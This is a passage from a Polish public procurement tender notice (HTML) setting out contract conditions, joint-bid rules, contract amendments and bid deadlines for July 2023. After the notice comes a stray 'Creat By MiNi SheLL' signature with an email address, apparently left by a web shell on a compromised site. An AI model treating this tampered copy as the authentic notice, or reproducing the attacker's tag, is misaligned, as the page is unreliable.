dokumenty, o których mowa w Części IV ust. 3 pkt. 7 (zobowiązanie podmiotu udostępniającego zasoby),<br/>5)	załącznik nr 4 do SWZ- oświadczenie o braku podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku oferty składanej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia, ocena warunków określonych w Części IV ust. 2 pkt. 1 będzie dokonana łącznie w stosunku do Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Każdy z warunków może być spełniony wspólnie przez jednego, kilku lub wszystkich wykonawców łącznie. <br/>W stosunku do żadnego z wykonawców składających ofertę wspólną nie mogą zajść przesłanki wykluczenia określone w art. 108 ust. 1 Pzp i art. 109 ust. 1 Pzp (w zakresie określonym przez Zamawiającego)<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3) przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4) jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany oraz późniejsze uzupełnienia dotyczące warunków niniejszej Umowy i rozkładu jazdy wymagają wzajemnego uzgodnienia w formie pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę poprzez Platformę e-Zamówienia za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-27 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com